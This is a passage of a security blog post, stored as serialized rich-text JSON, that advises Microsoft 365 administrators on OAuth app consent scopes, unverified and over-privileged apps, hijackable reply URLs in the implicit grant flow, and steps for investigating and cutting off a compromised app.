365 administrators are able to ",[],{},{"nodeType":186,"data":269467,"content":269469},{"uri":269468},"https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/configure-permission-classifications",[269470],{"nodeType":173,"value":269471,"marks":269472,"data":269474},"specify low-risk scopes",[269473],{"type":194},{},{"nodeType":173,"value":269476,"marks":269477,"data":269478},", such as ones specifically used for performing social logins (which are okay to do ",[],{},{"nodeType":1698,"data":269480,"content":269484},{"target":269481},{"sys":269482},{"id":269483,"type":317,"linkType":318},"68syxk4cmD6QOdVRcDqgEZ",[269485],{"nodeType":173,"value":269486,"marks":269487,"data":269489},"by the way",[269488],{"type":194},{},{"nodeType":173,"value":269491,"marks":269492,"data":269493},"). Admins can then allow employees to perform social logins, and integrate apps making use of other low-risk scopes from  verified apps only. Employees can also request access to anything requiring other scopes. This is a great way to enable users to perform their jobs, while preventing them from accidentally exposing themselves or the wider organization to unnecessary risk.",[],{},{"nodeType":312,"data":269495,"content":269499},{"target":269496},{"sys":269497},{"id":269498,"type":317,"linkType":318},"44NsMwlLpX4qnZP94GyTSO",[],{"nodeType":178,"data":269501,"content":269502},{},[269503],{"nodeType":173,"value":269504,"marks":269505,"data":269506},"When configuring the above for the first time, Microsoft provides a list of 5 scopes:",[],{},{"nodeType":1653,"data":269508,"content":269509},{},[269510,269533,269556,269579,269602],{"nodeType":1657,"data":269511,"content":269512},{},[269513,269523],{"nodeType":1687,"data":269514,"content":269515},{},[269516],{"nodeType":178,"data":269517,"content":269518},{},[269519],{"nodeType":173,"value":269520,"marks":269521,"data":269522},"profile",[],{},{"nodeType":1687,"data":269524,"content":269525},{},[269526],{"nodeType":178,"data":269527,"content":269528},{},[269529],{"nodeType":173,"value":269530,"marks":269531,"data":269532},"View user's basic profile",[],{},{"nodeType":1657,"data":269534,"content":269535},{},[269536,269546],{"nodeType":1687,"data":269537,"content":269538},{},[269539],{"nodeType":178,"data":269540,"content":269541},{},[269542],{"nodeType":173,"value":269543,"marks":269544,"data":269545},"openid",[],{},{"nodeType":1687,"data":269547,"content":269548},{},[269549],{"nodeType":178,"data":269550,"content":269551},{},[269552],{"nodeType":173,"value":269553,"marks":269554,"data":269555},"Sign users in",[],{},{"nodeType":1657,"data":269557,"content":269558},{},[269559,269569],{"nodeType":1687,"data":269560,"content":269561},{},[269562],{"nodeType":178,"data":269563,"content":269564},{},[269565],{"nodeType":173,"value":269566,"marks":269567,"data":269568},"email",[],{},{"nodeType":1687,"data":269570,"content":269571},{},[269572],{"nodeType":178,"data":269573,"content":269574},{},[269575],{"nodeType":173,"value":269576,"marks":269577,"data":269578},"View user's email address",[],{},{"nodeType":1657,"data":269580,"content":269581},{},[269582,269592],{"nodeType":1687,"data":269583,"content":269584},{},[269585],{"nodeType":178,"data":269586,"content":269587},{},[269588],{"nodeType":173,"value":269589,"marks":269590,"data":269591},"User.Read",[],{},{"nodeType":1687,"data":269593,"content":269594},{},[269595],{"nodeType":178,"data":269596,"content":269597},{},[269598],{"nodeType":173,"value":269599,"marks":269600,"data":269601},"Sign in and read user profile",[],{},{"nodeType":1657,"data":269603,"content":269604},{},[269605,269615],{"nodeType":1687,"data":269606,"content":269607},{},[269608],{"nodeType":178,"data":269609,"content":269610},{},[269611],{"nodeType":173,"value":269612,"marks":269613,"data":269614},"Offline_access",[],{},{"nodeType":1687,"data":269616,"content":269617},{},[269618],{"nodeType":178,"data":269619,"content":269620},{},[269621],{"nodeType":173,"value":269622,"marks":269623,"data":269624},"Maintain access to data you. have given it access to (refresh tokens)",[],{},{"nodeType":178,"data":269626,"content":269627},{},[269628],{"nodeType":173,"value":269629,"marks":269630,"data":269631},"The above scopes are the minimum required to enable social logins to take place, and would cover a good amount of apps that only require basic information for account creation purposes. ",[],{},{"nodeType":178,"data":269633,"content":269634},{},[269635],{"nodeType":173,"value":269636,"marks":269637,"data":269638},"If you’d like to go a step further, you should also consider approving the following to allow users to integrate these relatively common scopes from verified apps:",[],{},{"nodeType":1653,"data":269640,"content":269641},{},[269642,269665,269688,269711,269734,269757,269780,269803,269826,269849,269872],{"nodeType":1657,"data":269643,"content":269644},{},[269645,269655],{"nodeType":1687,"data":269646,"content":269647},{},[269648],{"nodeType":178,"data":269649,"content":269650},{},[269651],{"nodeType":173,"value":269652,"marks":269653,"data":269654},"Calendars.Read",[],{},{"nodeType":1687,"data":269656,"content":269657},{},[269658],{"nodeType":178,"data":269659,"content":269660},{},[269661],{"nodeType":173,"value":269662,"marks":269663,"data":269664},"Read user calendars",[],{},{"nodeType":1657,"data":269666,"content":269667},{},[269668,269678],{"nodeType":1687,"data":269669,"content":269670},{},[269671],{"nodeType":178,"data":269672,"content":269673},{},[269674],{"nodeType":173,"value":269675,"marks":269676,"data":269677},"Calendars.ReadWrite",[],{},{"nodeType":1687,"data":269679,"content":269680},{},[269681],{"nodeType":178,"data":269682,"content":269683},{},[269684],{"nodeType":173,"value":269685,"marks":269686,"data":269687},"Have full access to user calendars",[],{},{"nodeType":1657,"data":269689,"content":269690},{},[269691,269701],{"nodeType":1687,"data":269692,"content":269693},{},[269694],{"nodeType":178,"data":269695,"content":269696},{},[269697],{"nodeType":173,"value":269698,"marks":269699,"data":269700},"Calendars.ReadWrite.Shared",[],{},{"nodeType":1687,"data":269702,"content":269703},{},[269704],{"nodeType":178,"data":269705,"content":269706},{},[269707],{"nodeType":173,"value":269708,"marks":269709,"data":269710},"Read and write user and shared calendars",[],{},{"nodeType":1657,"data":269712,"content":269713},{},[269714,269724],{"nodeType":1687,"data":269715,"content":269716},{},[269717],{"nodeType":178,"data":269718,"content":269719},{},[269720],{"nodeType":173,"value":269721,"marks":269722,"data":269723},"Contacts.Read",[],{},{"nodeType":1687,"data":269725,"content":269726},{},[269727],{"nodeType":178,"data":269728,"content":269729},{},[269730],{"nodeType":173,"value":269731,"marks":269732,"data":269733},"Read user contacts",[],{},{"nodeType":1657,"data":269735,"content":269736},{},[269737,269747],{"nodeType":1687,"data":269738,"content":269739},{},[269740],{"nodeType":178,"data":269741,"content":269742},{},[269743],{"nodeType":173,"value":269744,"marks":269745,"data":269746},"Contacts.Read.Shared",[],{},{"nodeType":1687,"data":269748,"content":269749},{},[269750],{"nodeType":178,"data":269751,"content":269752},{},[269753],{"nodeType":173,"value":269754,"marks":269755,"data":269756},"Read user and shared contacts",[],{},{"nodeType":1657,"data":269758,"content":269759},{},[269760,269770],{"nodeType":1687,"data":269761,"content":269762},{},[269763],{"nodeType":178,"data":269764,"content":269765},{},[269766],{"nodeType":173,"value":269767,"marks":269768,"data":269769},"Contacts.ReadWrite",[],{},{"nodeType":1687,"data":269771,"content":269772},{},[269773],{"nodeType":178,"data":269774,"content":269775},{},[269776],{"nodeType":173,"value":269777,"marks":269778,"data":269779},"Have full access to user contacts",[],{},{"nodeType":1657,"data":269781,"content":269782},{},[269783,269793],{"nodeType":1687,"data":269784,"content":269785},{},[269786],{"nodeType":178,"data":269787,"content":269788},{},[269789],{"nodeType":173,"value":269790,"marks":269791,"data":269792},"Contacts.ReadWrite.Shared",[],{},{"nodeType":1687,"data":269794,"content":269795},{},[269796],{"nodeType":178,"data":269797,"content":269798},{},[269799],{"nodeType":173,"value":269800,"marks":269801,"data":269802},"Read and write user and shared contacts",[],{},{"nodeType":1657,"data":269804,"content":269805},{},[269806,269816],{"nodeType":1687,"data":269807,"content":269808},{},[269809],{"nodeType":178,"data":269810,"content":269811},{},[269812],{"nodeType":173,"value":269813,"marks":269814,"data":269815},"People.Read",[],{},{"nodeType":1687,"data":269817,"content":269818},{},[269819],{"nodeType":178,"data":269820,"content":269821},{},[269822],{"nodeType":173,"value":269823,"marks":269824,"data":269825},"Read users' relevant people lists",[],{},{"nodeType":1657,"data":269827,"content":269828},{},[269829,269839],{"nodeType":1687,"data":269830,"content":269831},{},[269832],{"nodeType":178,"data":269833,"content":269834},{},[269835],{"nodeType":173,"value":269836,"marks":269837,"data":269838},"Files.Read.Selected",[],{},{"nodeType":1687,"data":269840,"content":269841},{},[269842],{"nodeType":178,"data":269843,"content":269844},{},[269845],{"nodeType":173,"value":269846,"marks":269847,"data":269848},"Read files that the user selects",[],{},{"nodeType":1657,"data":269850,"content":269851},{},[269852,269862],{"nodeType":1687,"data":269853,"content":269854},{},[269855],{"nodeType":178,"data":269856,"content":269857},{},[269858],{"nodeType":173,"value":269859,"marks":269860,"data":269861},"Files.ReadWrite.Selected",[],{},{"nodeType":1687,"data":269863,"content":269864},{},[269865],{"nodeType":178,"data":269866,"content":269867},{},[269868],{"nodeType":173,"value":269869,"marks":269870,"data":269871},"Read and write files that the user selects",[],{},{"nodeType":1657,"data":269873,"content":269874},{},[269875,269885],{"nodeType":1687,"data":269876,"content":269877},{},[269878],{"nodeType":178,"data":269879,"content":269880},{},[269881],{"nodeType":173,"value":269882,"marks":269883,"data":269884},"User.ReadWrite",[],{},{"nodeType":1687,"data":269886,"content":269887},{},[269888],{"nodeType":178,"data":269889,"content":269890},{},[269891],{"nodeType":173,"value":269892,"marks":269893,"data":269894},"Read and write access to user profile",[],{},{"nodeType":178,"data":269896,"content":269897},{},[269898],{"nodeType":173,"value":269899,"marks":269900,"data":269901},"We’ve determined these scopes to be relatively low-risk, but this would depend on the risk appetite of your organization. Pre-approving the scopes will go a long way towards enabling your users to make use of SaaS apps without raising unnecessary approval requests from your IT or security team.",[],{},{"nodeType":169,"data":269903,"content":269904},{},[269905],{"nodeType":173,"value":269906,"marks":269907,"data":269908},"Unverified apps",[],{},{"nodeType":235,"data":269910,"content":269911},{},[269912],{"nodeType":173,"value":269400,"marks":269913,"data":269914},[],{},{"nodeType":178,"data":269916,"content":269917},{},[269918,269922,269931,269935,269944],{"nodeType":173,"value":269919,"marks":269920,"data":269921},"First, let’s define what causes an app to be classified as unverified. When you see an app in your tenant that’s marked as unverified, it means that the tenant that publishes the app has not gone through the ",[],{},{"nodeType":186,"data":269923,"content":269925},{"uri":269924},"https://learn.microsoft.com/en-gb/azure/active-directory/develop/publisher-verification-overview",[269926],{"nodeType":173,"value":269927,"marks":269928,"data":269930},"Publisher Verification",[269929],{"type":194},{},{"nodeType":173,"value":269932,"marks":269933,"data":269934}," process. Going through the verification process requires the publisher to have a Microsoft Partner Network (MPN) account, which typically involves ",[],{},{"nodeType":186,"data":269936,"content":269938},{"uri":269937},"https://learn.microsoft.com/en-us/partner-center/verification-responses",[269939],{"nodeType":173,"value":269940,"marks":269941,"data":269943},"verifying",[269942],{"type":194},{},{"nodeType":173,"value":269945,"marks":269946,"data":269947}," their business address, email address, and a few additional due diligence tasks. ",[],{},{"nodeType":178,"data":269949,"content":269950},{},[269951],{"nodeType":173,"value":269952,"marks":269953,"data":269954},"While I’m sure this is not a 100% infallible process, at the very least it provides you with the confidence that someone at Microsoft had reached out to the company and spoken to someone who claims they are who they say they are. This is opposed to a random person creating a Microsoft Azure tenant and marking their app as being published by Adobe, as an example.",[],{},{"nodeType":178,"data":269956,"content":269957},{},[269958],{"nodeType":173,"value":269959,"marks":269960,"data":269961},"At Push, we’ve noticed plenty of unverified apps published by legitimate vendors. This could be related to vendors having multiple tenants, and not having completed the verification process across all yet. As an example, we have a few of Adobe’s apps for Microsoft 365:",[],{},{"nodeType":312,"data":269963,"content":269967},{"target":269964},{"sys":269965},{"id":269966,"type":317,"linkType":318},"4eDWZKrMau1AfU4pXgOW42",[],{"nodeType":178,"data":269969,"content":269970},{},[269971],{"nodeType":173,"value":269972,"marks":269973,"data":269974},"In the above image, we have a verified app from Adobe, Inc. We know this due to the ‘Verified Publisher’ attribute that is included when parsing the information provided by Microsoft. We can also see that the only reply url is one associated directly with Adobe – adobe.com. Next, we have an unverified app:",[],{},{"nodeType":312,"data":269976,"content":269980},{"target":269977},{"sys":269978},{"id":269979,"type":317,"linkType":318},"5e5RhdYiMh0Q3CZzmNoRDI",[],{"nodeType":178,"data":269982,"content":269983},{},[269984],{"nodeType":173,"value":269985,"marks":269986,"data":269987},"This app does not include the ‘verified publisher’ attribute when reading the information provided by Microsoft. However, the app only has one reply url, and this is again a subdomain of adobe.com.",[],{},{"nodeType":178,"data":269989,"content":269990},{},[269991],{"nodeType":173,"value":269992,"marks":269993,"data":269994},"The takeaway here is that not all unverified apps are malicious. More often than not it’s related to the vendor not having gone through the verification process, but this means it unfortunately becomes the security team’s burden to figure out.",[],{},{"nodeType":235,"data":269996,"content":269997},{},[269998],{"nodeType":173,"value":269442,"marks":269999,"data":270000},[],{},{"nodeType":178,"data":270002,"content":270003},{},[270004],{"nodeType":173,"value":270005,"marks":270006,"data":270007},"At Push, we attempt to review every application we come across to determine if it's legit and whether it belongs to the vendor it claims to originate from. There are multiple ways to do this, but as a general rule of thumb if all the app’s reply urls are associated with the vendor, you are good. You can perform an integration from the app’s website to verify that the particular app ID (seen in the metadata tag above) is the one you are looking at in your environment.",[],{},{"nodeType":169,"data":270009,"content":270010},{},[270011],{"nodeType":173,"value":270012,"marks":270013,"data":270014},"Apps with excessive privileges",[],{},{"nodeType":235,"data":270016,"content":270017},{},[270018],{"nodeType":173,"value":269400,"marks":270019,"data":270020},[],{},{"nodeType":178,"data":270022,"content":270023},{},[270024],{"nodeType":173,"value":270025,"marks":270026,"data":270027},"When you first start doing deep dives on permissions associated with apps in your environment, you find yourself looking at some apps and wonder out loud “we’re granting this vendor access to what?!",[],{},{"nodeType":178,"data":270029,"content":270030},{},[270031],{"nodeType":173,"value":270032,"marks":270033,"data":270034},"It’s a totally normal response, but don't worry, we’re here to help. Let’s take diagrams.net as an example:",[],{},{"nodeType":312,"data":270036,"content":270040},{"target":270037},{"sys":270038},{"id":270039,"type":317,"linkType":318},"7DcPUSZ0nDYKmIy4E9xEHs",[],{"nodeType":178,"data":270042,"content":270043},{},[270044],{"nodeType":173,"value":270045,"marks":270046,"data":270047},"At first glance this doesn’t seem too bad. For the purposes of this example, let’s say the app was approved by 49 users. That means if diagrams.net got compromised, an attacker would potentially have access to 49 of your user’s OneDrive files. “That’s OK!” you say. “This will only affect a handful of files they’ve been working on locally. Our policy specifies that any company data, specifically data containing PII, be stored in SharePoint.”",[],{},{"nodeType":178,"data":270049,"content":270050},{},[270051,270055,270060],{"nodeType":173,"value":270052,"marks":270053,"data":270054},"And then comes the part where you notice the following permission: ",[],{},{"nodeType":173,"value":270056,"marks":270057,"data":270059},"Sites.Read.All",[270058],{"type":1646},{},{"nodeType":173,"value":270061,"marks":270062,"data":270063},". This permission gives the application the ability to read every file across all SharePoint sites in your organization (that the users have permission to access.) Suddenly the scope of data access is much larger than you hoped.",[],{},{"nodeType":235,"data":270065,"content":270066},{},[270067],{"nodeType":173,"value":269442,"marks":270068,"data":270069},[],{},{"nodeType":178,"data":270071,"content":270072},{},[270073],{"nodeType":173,"value":270074,"marks":270075,"data":270076},"When faced with the dilemma of granting apps access to resources within your organization, the best course of action is to do a risk assessment.",[],{},{"nodeType":178,"data":270078,"content":270079},{},[270080,270084,270092,270096,270105],{"nodeType":173,"value":270081,"marks":270082,"data":270083},"This requires some good ol’ googling and reviewing the security policies of the app’s creator. You ideally also want to know who they use to process your data. Through this process, I found a ",[],{},{"nodeType":186,"data":270085,"content":270087},{"uri":270086},"https://www.diagrams.net/blog/data-protection",[270088],{"nodeType":173,"value":148689,"marks":270089,"data":270091},[270090],{"type":194},{},{"nodeType":173,"value":270093,"marks":270094,"data":270095}," on diagrams.net detailing their approach to security and user privacy. They do make note that they don’t ",[],{},{"nodeType":186,"data":270097,"content":270099},{"uri":270098},"https://www.diagrams.net/blog/data-protection#:~:text=Because%20your%20sensitive%20diagram%20data%20doesn%E2%80%99t%20leave%20your%20infrastructure%20and%20is%20never%20stored%20on%20the%20diagrams.net%20servers%2C%20diagrams.net%20is%20a%20tool%20which%20lets%20you%20comply%20with%20data%20protection%20certifications%20(ISO%2027000%2C%2027001%20and%2027002)%20and%20the%20GDPR.",[270100],{"nodeType":173,"value":270101,"marks":270102,"data":270104},"store any sensitive customer data data on their servers",[270103],{"type":194},{},{"nodeType":173,"value":270106,"marks":270107,"data":270108},", and thus let you comply with GDPR, ISO 2700* etc. certifications if you use their services.",[],{},{"nodeType":178,"data":270110,"content":270111},{},[270112],{"nodeType":173,"value":270113,"marks":270114,"data":270115},"While this is great from a tick box exercise perspective, this doesn’t address the original concern – how much risk are you taking on by letting their app integrate with your environment? What could an attacker who compromises diagrams.net have access to and how do you lessen the risk while still allowing employees to use the app?",[],{},{"nodeType":178,"data":270117,"content":270118},{},[270119,270123,270132],{"nodeType":173,"value":270120,"marks":270121,"data":270122},"Further in the same blog post, they link to a GitHub ",[],{},{"nodeType":186,"data":270124,"content":270126},{"uri":270125},"https://github.com/jgraph/security-privacy-legal",[270127],{"nodeType":173,"value":270128,"marks":270129,"data":270131},"repository",[270130],{"type":194},{},{"nodeType":173,"value":270133,"marks":270134,"data":270135}," that contains their security and privacy processes, policies, and even some pentest reports. They do a great job of including this information, by the way, so cheers to diagrams.net!",[],{},{"nodeType":178,"data":270137,"content":270138},{},[270139],{"nodeType":173,"value":270140,"marks":270141,"data":270142},"At this point you should have a better understanding of the security of the vendor you’re integrating into your organization, and whether it’s okay to accept the risk. Documenting and adding the information you found to your risk register is also a good idea. Likely, you’ll be taking this information to your Information Security Manager for risk acceptance. ",[],{},{"nodeType":178,"data":270144,"content":270145},{},[270146],{"nodeType":173,"value":270147,"marks":270148,"data":270149},"We’re working on ways to provide this information to our clients through the Push app dashboard in future, too. Sign up or subscribe to our blog to get product updates when features like this are introduced. ",[],{},{"nodeType":169,"data":270151,"content":270152},{},[270153],{"nodeType":173,"value":270154,"marks":270155,"data":270156},"Hijackable urls and implicit grant flow",[],{},{"nodeType":235,"data":270158,"content":270159},{},[270160],{"nodeType":173,"value":269400,"marks":270161,"data":270162},[],{},{"nodeType":178,"data":270164,"content":270165},{},[270166,270171,270181,270186,270196],{"nodeType":173,"value":270167,"marks":270168,"data":270170},"Developer side note: The implicit grant flow is no longer recommended due to security-related concerns and that it won’t function where ",[270169],{"type":1646},{},{"nodeType":186,"data":270172,"content":270174},{"uri":270173},"https://learn.microsoft.com/en-us/azure/active-directory/develop/reference-third-party-cookies-spas#:~:text=Many%20browsers%20block%20third%2Dparty%20cookies%2C%20cookies%20on%20requests%20to%20domains%20other%20than%20the%20domain%20shown%20in%20the%20browser%27s%20address%20bar.%20This%20block%20breaks%20the%20implicit%20flow%20and%20requires%20new%20authentication%20patterns%20to%20successfully%20sign%20in%20users.",[270175],{"nodeType":173,"value":270176,"marks":270177,"data":270180},"3rd party cookies are blocked in browsers",[270178,270179],{"type":194},{"type":1646},{},{"nodeType":173,"value":270182,"marks":270183,"data":270185},". Instead, you should switch to using the ",[270184],{"type":1646},{},{"nodeType":186,"data":270187,"content":270189},{"uri":270188},"https://learn.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow",[270190],{"nodeType":173,"value":270191,"marks":270192,"data":270195},"authorization code flow",[270193,270194],{"type":194},{"type":1646},{},{"nodeType":173,"value":270197,"marks":270198,"data":270200}," if applicable to your requirements.",[270199],{"type":1646},{},{"nodeType":178,"data":270202,"content":270203},{},[270204,270208,270217],{"nodeType":173,"value":270205,"marks":270206,"data":270207},"Let’s quickly go over how OAuth2’s implicit grant flow works so you can better understand how to spot potentially risky apps and integrations, and why this can result in a security concern. Microsoft provides a great ",[],{},{"nodeType":186,"data":270209,"content":270211},{"uri":270210},"https://learn.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-implicit-grant-flow",[270212],{"nodeType":173,"value":270213,"marks":270214,"data":270216},"breakdown",[270215],{"type":194},{},{"nodeType":173,"value":270218,"marks":270219,"data":270220}," of the implicit grant flow, however for the purposes of brevity (and simplicity), it does the following:",[],{},{"nodeType":246189,"data":270222,"content":270223},{},[270224,270234,270244,270254,270264],{"nodeType":254,"data":270225,"content":270226},{},[270227],{"nodeType":178,"data":270228,"content":270229},{},[270230],{"nodeType":173,"value":270231,"marks":270232,"data":270233},"A user goes to a web app and clicks a login link",[],{},{"nodeType":254,"data":270235,"content":270236},{},[270237],{"nodeType":178,"data":270238,"content":270239},{},[270240],{"nodeType":173,"value":270241,"marks":270242,"data":270243},"The web app redirects the user to authenticate and authorize the app. This is performed against your identity provider (in this example, Microsoft)",[],{},{"nodeType":254,"data":270245,"content":270246},{},[270247],{"nodeType":178,"data":270248,"content":270249},{},[270250],{"nodeType":173,"value":270251,"marks":270252,"data":270253},"If this is the first time authorizing the app, the user is presented with a list of scopes (permissions) the app will need access to, and the user clicks “approve”",[],{},{"nodeType":254,"data":270255,"content":270256},{},[270257],{"nodeType":178,"data":270258,"content":270259},{},[270260],{"nodeType":173,"value":270261,"marks":270262,"data":270263},"This responds with a token to one of the hard-coded reply urls associated with the app integration (e.g. https://apps.diagrams.net/microsoft as with the ‘Apps with excessive privileges’ example)",[],{},{"nodeType":254,"data":270265,"content":270266},{},[270267],{"nodeType":178,"data":270268,"content":270269},{},[270270],{"nodeType":173,"value":270271,"marks":270272,"data":270273},"The app uses the token to access the user’s resources with the permissions approved in step 3",[],{},{"nodeType":178,"data":270275,"content":270276},{},[270277],{"nodeType":173,"value":270278,"marks":270279,"data":270280},"Based on the flow above, if an attacker gets their hands on the token from step 4, they can perform requests as the user, granting them access to your resources. To get the token, you need to control one of the hardcoded reply url endpoints, and convince a user to authenticate to the app – perhaps via a phishing attack.",[],{},{"nodeType":178,"data":270282,"content":270283},{},[270284],{"nodeType":173,"value":270285,"marks":270286,"data":270287},"As an example, some of the apps we’ve reviewed contained reply urls which were subdomains of azurewebsites.net and ngrok.io. These urls don’t appear problematic at first. However, the urls could have been used during the development process, and were forgotten about at the conclusion of the project. During the review process we follow at Push, we found multiple examples of such urls that were no longer in use.",[],{},{"nodeType":178,"data":270289,"content":270290},{},[270291,270295,270304],{"nodeType":173,"value":270292,"marks":270293,"data":270294},"This could allow an attacker to register the urls and perform phishing attacks against organizations that use these particular apps, granting the attacker access to previously- approved scopes and resources. The outcome of this attack would be similar to ",[],{},{"nodeType":186,"data":270296,"content":270298},{"uri":270297},"https://www.oauth.com/oauth2-servers/authorization/security-considerations/#:~:text=Redirect%20URL%20Manipulation",[270299],{"nodeType":173,"value":270300,"marks":270301,"data":270303},"redirect URL manipulation",[270302],{"type":194},{},{"nodeType":173,"value":270305,"marks":270306,"data":270307},", but instead of taking advantage of an open or misconfigured redirect, the attacker is in control of the endpoint where the token ends up.",[],{},{"nodeType":178,"data":270309,"content":270310},{},[270311,270315,270323],{"nodeType":173,"value":270312,"marks":270313,"data":270314},"How would you even go about detecting if an app makes use of the implicit grant flow? This requires getting your hands dirty with making authorization requests to your tenant for the specific app ID, and passing the “response_type=token” parameter in the url. This should return an error if the app is not configured with the implicit grant flow. If you’d like to test this yourself, you can follow the “Run in Postman” link at the top of ",[],{},{"nodeType":186,"data":270316,"content":270317},{"uri":270210},[270318],{"nodeType":173,"value":270319,"marks":270320,"data":270322},"this article",[270321],{"type":194},{},{"nodeType":173,"value":270324,"marks":270325,"data":270326}," to make this process a bit easier.",[],{},{"nodeType":178,"data":270328,"content":270329},{},[270330],{"nodeType":173,"value":270331,"marks":270332,"data":270333},"Another example of a hijackable url includes dangling DNS records. Let’s say your app includes a reply url pointing to a legacy server used for development (eg. apptesting-dev.ctrlaltsecure.com). This server was hosted on an EC2 instance in AWS, and has long since been decommissioned. However, the IP address associated with the instance is still pointing to the same address. A determined attacker could potentially gain access to the IP address by spinning up resources until it’s assigned to them.",[],{},{"nodeType":178,"data":270335,"content":270336},{},[270337,270341,270350,270354,270363],{"nodeType":173,"value":270338,"marks":270339,"data":270340},"OWASP has ",[],{},{"nodeType":186,"data":270342,"content":270344},{"uri":270343},"https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/10-Test_for_Subdomain_Takeover",[270345],{"nodeType":173,"value":270346,"marks":270347,"data":270349},"published an article",[270348],{"type":194},{},{"nodeType":173,"value":270351,"marks":270352,"data":270353}," and HackerOne ",[],{},{"nodeType":186,"data":270355,"content":270357},{"uri":270356},"https://www.hackerone.com/application-security/guide-subdomain-takeovers",[270358],{"nodeType":173,"value":270359,"marks":270360,"data":270362},"posted a guide",[270361],{"type":194},{},{"nodeType":173,"value":270364,"marks":270365,"data":270366}," highlighting ways to take over subdomains , and it’s very easy to overlook.",[],{},{"nodeType":235,"data":270368,"content":270369},{},[270370],{"nodeType":173,"value":269442,"marks":270371,"data":270372},[],{},{"nodeType":178,"data":270374,"content":270375},{},[270376],{"nodeType":173,"value":270377,"marks":270378,"data":270379},"Unfortunately there is no elegant solution to this problem, and it’s not easy to spot as you would need to review each url to see if it’s still in use, in addition to figuring out if the app makes use of the implicit grant flow. Even then, is the active url being used by the developer, or has an attacker already claimed it.",[],{},{"nodeType":178,"data":270381,"content":270382},{},[270383],{"nodeType":173,"value":270384,"marks":270385,"data":270386},"The best course of action here is likely to make use of a proxy that prevents users from accessing unclassified urls, or urls with a low reputation. However, you will risk breaking applications and making your developers angry. This also does not solve the dangling DNS issue, as with the EC2 instance problem above.",[],{},{"nodeType":178,"data":270388,"content":270389},{},[270390],{"nodeType":173,"value":270391,"marks":270392,"data":270393},"Another option is to contact vendors of apps that you’ve noticed including such urls in their apps and ask them to remove the stale entries from their apps.",[],{},{"nodeType":169,"data":270395,"content":270396},{},[270397],{"nodeType":173,"value":270398,"marks":270399,"data":270400},"You think you’ve been compromised. Now what?",[],{},{"nodeType":178,"data":270402,"content":270403},{},[270404],{"nodeType":173,"value":270405,"marks":270406,"data":270407},"\nRegardless of the method of compromise, there’s a few steps you can take to review what happened and to prevent further access into your environment.",[],{},{"nodeType":235,"data":270409,"content":270410},{},[270411],{"nodeType":173,"value":270412,"marks":270413,"data":270414},"Review app sign-in logs",[],{},{"nodeType":178,"data":270416,"content":270417},{},[270418,270422,270431],{"nodeType":173,"value":270419,"marks":270420,"data":270421},"In Azure Active Directory, head to ",[],{},{"nodeType":186,"data":270423,"content":270425},{"uri":270424},"https://portal.azure.com/#view/Microsoft_AAD_IAM/StartboardApplicationsMenuBlade/~/AppAppsPreview/menuId~/null",[270426],{"nodeType":173,"value":270427,"marks":270428,"data":270430},"Enterprise applications",[270429],{"type":194},{},{"nodeType":173,"value":270432,"marks":270433,"data":270434}," and click on the app you want to review. In the new window, click on sign-in logs. You will be presented with a list of user sign-ins (interactive and non-interactive), service principal sign-ins, and managed identity sign-ins.",[],{},{"nodeType":312,"data":270436,"content":270440},{"target":270437},{"sys":270438},{"id":270439,"type":317,"linkType":318},"2L7vf2zjZBelGMJSjP2inY",[],{"nodeType":178,"data":270442,"content":270443},{},[270444],{"nodeType":173,"value":270445,"marks":270446,"data":270447},"What you typically need to look for is non-interactive user sign-in logs. Non-interactive sign-ins are related to login events performed on behalf of a user where usernames and passwords were not used (read: tokens). You want to review the sign-ins to determine if there were authentication events from IP addresses unrelated to normal employee activity, which can include discrepancies in geographical locations, and out-of-hours activity. Service principal sign-ins would also be of interest, however it would be more difficult to determine odd behavior as you wouldn’t have user sign-ins to compare with.",[],{},{"nodeType":178,"data":270449,"content":270450},{},[270451,270455,270463],{"nodeType":173,"value":270452,"marks":270453,"data":270454},"You could also review Azure’s ",[],{},{"nodeType":186,"data":270456,"content":270458},{"uri":270457},"https://portal.azure.com/#view/Microsoft_AAD_IAM/SecurityMenuBlade/~/RiskySignIns",[270459],{"nodeType":173,"value":270460,"marks":270461,"data":270462},"risky sign-ins ",[],{},{"nodeType":173,"value":270464,"marks":270465,"data":270466},"page, as these issues are likely to show up already classified. Just make sure your filters include non-interactive sign-in methods.",[],{},{"nodeType":235,"data":270468,"content":270469},{},[270470],{"nodeType":173,"value":270471,"marks":270472,"data":270473},"Review app audit logs",[],{},{"nodeType":178,"data":270475,"content":270476},{},[270477],{"nodeType":173,"value":270478,"marks":270479,"data":270480},"In the same window underneath sign-in logs, you’ll find the audit logs section. Audit logs will provide you with crucial information relating to when an app was integrated, by who, and which permissions were delegated.",[],{},{"nodeType":312,"data":270482,"content":270486},{"target":270483},{"sys":270484},{"id":270485,"type":317,"linkType":318},"5HRLoa9zlIWZdZGLN84Yae",[],{"nodeType":235,"data":270488,"content":270489},{},[270490],{"nodeType":173,"value":270491,"marks":270492,"data":270493},"Disable the app",[],{},{"nodeType":178,"data":270495,"content":270496},{},[270497],{"nodeType":173,"value":270498,"marks":270499,"data":270500},"If you’ve determined that an app was involved in an incident, the first step would be to disable the app to prevent malicious actors from performing any further authentication. Under the application’s properties, change the setting “Enable for users to sign-in?” from “Yes” to “No”, followed by clicking “Save.”",[],{},{"nodeType":312,"data":270502,"content":270506},{"target":270503},{"sys":270504},{"id":270505,"type":317,"linkType":318},"12NnJ8OhD3K27rFRJ48t6a",[],{"nodeType":235,"data":270508,"content":270509},{},[270510],{"nodeType":173,"value":270511,"marks":270512,"data":270513},"Revoke all refresh tokens",[],{},{"nodeType":178,"data":270515,"content":270516},{},[270517,270521,270530,270534,270543,270547,270556],{"nodeType":173,"value":270518,"marks":270519,"data":270520},"Disabling the app is not enough to prevent attackers from maintaining access to your environment. ",[],{},{"nodeType":186,"data":270522,"content":270524},{"uri":270523},"https://learn.microsoft.com/en-us/azure/active-directory/develop/refresh-tokens",[270525],{"nodeType":173,"value":270526,"marks":270527,"data":270529},"Refresh tokens",[270528],{"type":194},{},{"nodeType":173,"value":270531,"marks":270532,"data":270533}," provide a way for apps to retrieve new access tokens without bugging users with pesky sign-in screens. Tokens are typically valid for between 